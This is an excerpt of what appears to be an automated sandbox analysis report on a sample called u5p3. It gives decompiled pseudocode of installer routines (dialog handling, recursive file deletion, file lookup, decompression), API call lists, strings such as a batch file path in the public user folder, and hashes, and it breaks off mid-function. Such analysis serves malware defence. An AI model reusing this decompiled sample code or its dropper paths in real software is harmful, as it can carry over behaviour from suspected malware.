                                                        0x00405414
                                                        0x0040541c
                                                        0x00405420
                                                        0x00405423
                                                        0x00405426
                                                        0x00405429
                                                        0x0040542c
                                                        0x0040542d
                                                        0x0040542e
                                                        0x00405447
                                                        0x0040544a
                                                        0x00405454
                                                        0x00405463
                                                        0x0040546b
                                                        0x00405473
                                                        0x00405478
                                                        0x0040547b
                                                        0x00405487
                                                        0x00405490
                                                        0x00405499
                                                        0x004054bb
                                                        0x004054c1
                                                        0x004054d2
                                                        0x004054d7
                                                        0x004054e5
                                                        0x004054f3
                                                        0x004054f3
                                                        0x004054f8
                                                        0x00405506
                                                        0x00405506
                                                        0x0040550b
                                                        0x0040550e
                                                        0x00405513
                                                        0x0040551f
                                                        0x00405528
                                                        0x00405535
                                                        0x00405544
                                                        0x00405537
                                                        0x0040553c
                                                        0x0040553c
                                                        0x00405550
                                                        0x00405550
                                                        0x00405564
                                                        0x0040556d
                                                        0x00405576
                                                        0x00405586
                                                        0x00405592
                                                        0x00405592
                                                        0x00000000

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 0040544D
                                                        • GetDlgItem.USER32 ref: 0040545C
                                                        • GetClientRect.USER32 ref: 00405499
                                                        • GetSystemMetrics.USER32 ref: 004054A0
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
                                                        • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                        • GetDlgItem.USER32 ref: 0040555D
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                        • GetDlgItem.USER32 ref: 0040546B
                                                          • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                        • GetDlgItem.USER32 ref: 004055AF
                                                        • CreateThread.KERNELBASE ref: 004055BD
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055C4
                                                        • ShowWindow.USER32(00000000), ref: 004055E8
                                                        • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                        • ShowWindow.USER32(00000008), ref: 00405637
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                        • CreatePopupMenu.USER32 ref: 0040567C
                                                        • AppendMenuW.USER32 ref: 00405690
                                                        • GetWindowRect.USER32 ref: 004056B0
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                        • OpenClipboard.USER32(00000000), ref: 00405711
                                                        • EmptyClipboard.USER32 ref: 00405717
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                        • GlobalLock.KERNEL32 ref: 0040572D
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                        • SetClipboardData.USER32 ref: 0040576C
                                                        • CloseClipboard.USER32 ref: 00405772
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: {$6B
                                                        • API String ID: 4154960007-3705917127
                                                        • Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                        • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                        • Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
                                                        • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 499 40595a-405980 call 405c25 502 405982-405994 DeleteFileW 499->502 503 405999-4059a0 499->503 504 405b16-405b1a 502->504 505 4059a2-4059a4 503->505 506 4059b3-4059c3 call 40624c 503->506 507 405ac4-405ac9 505->507 508 4059aa-4059ad 505->508 512 4059d2-4059d3 call 405b69 506->512 513 4059c5-4059d0 lstrcatW 506->513 507->504 510 405acb-405ace 507->510 508->506 508->507 514 405ad0-405ad6 510->514 515 405ad8-405ae0 call 40658f 510->515 516 4059d8-4059dc 512->516 513->516 514->504 515->504 523 405ae2-405af6 call 405b1d call 405912 515->523 519 4059e8-4059ee lstrcatW 516->519 520 4059de-4059e6 516->520 522 4059f3-405a0f lstrlenW FindFirstFileW 519->522 520->519 520->522 524 405a15-405a1d 522->524 525 405ab9-405abd 522->525 539 405af8-405afb 523->539 540 405b0e-405b11 call 4052b0 523->540 528 405a3d-405a51 call 40624c 524->528 529 405a1f-405a27 524->529 525->507 527 405abf 525->527 527->507 541 405a53-405a5b 528->541 542 405a68-405a73 call 405912 528->542 531 405a29-405a31 529->531 532 405a9c-405aac FindNextFileW 529->532 531->528 535 405a33-405a3b 531->535 532->524 538 405ab2-405ab3 FindClose 532->538 535->528 535->532 538->525 539->514 545 405afd-405b0c call 4052b0 call 406012 539->545 540->504 541->532 546 405a5d-405a66 call 40595a 541->546 552 405a94-405a97 call 4052b0 542->552 553 405a75-405a78 542->553 545->504 546->532 552->532 555 405a7a-405a8a call 4052b0 call 406012 553->555 556 405a8c-405a92 553->556 555->532 556->532
                                                        C-Code - Quality: 98%
                                                        			E0040595A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C25(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624C(0x4256f0, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B69(_t68);
					} else {
						lstrcatW(0x4256f0, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x4256f0,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040624C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405912(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052B0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E004052B0(0xfffffff1, _t68);
											E00406012(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040595A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x4256f0 - 0x5c;
					if( *0x4256f0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040658F(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B1D(_t68);
							_t38 = E00405912(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052B0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052B0(0xfffffff1, _t68);
							return E00406012(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                        0x00405964
                                                        0x00405969
                                                        0x00405972
                                                        0x00405975
                                                        0x0040597d
                                                        0x00405980
                                                        0x00405983
                                                        0x0040598b
                                                        0x0040598d
                                                        0x0040598e
                                                        0x00000000
                                                        0x0040598e
                                                        0x00405999
                                                        0x0040599c
                                                        0x0040599c
                                                        0x0040599c
                                                        0x004059a0
                                                        0x004059b3
                                                        0x004059ba
                                                        0x004059bf
                                                        0x004059c3
                                                        0x004059d3
                                                        0x004059c5
                                                        0x004059cb
                                                        0x004059cb
                                                        0x004059d8
                                                        0x004059dc
                                                        0x004059e8
                                                        0x004059ee
                                                        0x004059f3
                                                        0x004059f9
                                                        0x00405a04
                                                        0x00405a0a
                                                        0x00405a0c
                                                        0x00405a0f
                                                        0x00405ab9
                                                        0x00405ab9
                                                        0x00405abd
                                                        0x00405abf
                                                        0x00405abf
                                                        0x00405abf
                                                        0x00405abf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a15
                                                        0x00405a15
                                                        0x00405a15
                                                        0x00405a1d
                                                        0x00405a3d
                                                        0x00405a45
                                                        0x00405a4a
                                                        0x00405a51
                                                        0x00405a6c
                                                        0x00405a71
                                                        0x00405a73
                                                        0x00405a97
                                                        0x00405a75
                                                        0x00405a75
                                                        0x00405a78
                                                        0x00405a8c
                                                        0x00405a7a
                                                        0x00405a7d
                                                        0x00405a85
                                                        0x00405a85
                                                        0x00405a78
                                                        0x00405a53
                                                        0x00405a59
                                                        0x00405a5b
                                                        0x00405a61
                                                        0x00405a61
                                                        0x00405a5b
                                                        0x00000000
                                                        0x00405a51
                                                        0x00405a1f
                                                        0x00405a27
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a29
                                                        0x00405a31
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a33
                                                        0x00405a3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00405a9c
                                                        0x00405aa4
                                                        0x00405aaa
                                                        0x00405aaa
                                                        0x00405ab3
                                                        0x00000000
                                                        0x00405ab3
                                                        0x004059de
                                                        0x004059e6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004059a2
                                                        0x004059a2
                                                        0x004059a4
                                                        0x00405ac4
                                                        0x00405ac6
                                                        0x00405ac9
                                                        0x00405b1a
                                                        0x00405b1a
                                                        0x00405b1a
                                                        0x00405acb
                                                        0x00405ace
                                                        0x00405ad9
                                                        0x00405ade
                                                        0x00405ae0
                                                        0x00000000
                                                        0x00000000
                                                        0x00405ae3
                                                        0x00405aef
                                                        0x00405af4
                                                        0x00405af6
                                                        0x00000000
                                                        0x00405b11
                                                        0x00405af8
                                                        0x00405afb
                                                        0x00000000
                                                        0x00000000
                                                        0x00405b00
                                                        0x00000000
                                                        0x00405b07
                                                        0x00405ad0
                                                        0x00405ad0
                                                        0x00000000
                                                        0x00405ad0
                                                        0x004059aa
                                                        0x004059ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004059ad

                                                        APIs
                                                        • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 00405983
                                                        • lstrcatW.KERNEL32(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,\*.*), ref: 004059CB
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 004059EE
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 004059F4
                                                        • FindFirstFileW.KERNELBASE(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,7476FAA0,00000000), ref: 00405A04
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                        • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\Public\u5p3.bat" $C:\Users\user\AppData\Local\Temp\$Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri$\*.*
                                                        • API String ID: 2035342205-858891764
                                                        • Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                        • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                        • Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
                                                        • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0040658F(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426738); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426738;
			}




                                                        0x0040659a
                                                        0x004065a3
                                                        0x00000000
                                                        0x004065b0
                                                        0x004065a6
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,00426738,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,00405C6E,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,C:\Users\user\AppData\Local\Temp\nsn12E4.tmp,?,?,7476FAA0,0040597A,?,C:\Users\user\AppData\Local\Temp\,7476FAA0), ref: 0040659A
                                                        • FindClose.KERNEL32(00000000), ref: 004065A6
                                                        Strings
                                                        • 8gB, xrefs: 00406590
                                                        • C:\Users\user\AppData\Local\Temp\nsn12E4.tmp, xrefs: 0040658F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: 8gB$C:\Users\user\AppData\Local\Temp\nsn12E4.tmp
                                                        • API String ID: 2295610775-2056031267
                                                        • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                        • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                        • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                        • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406956() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
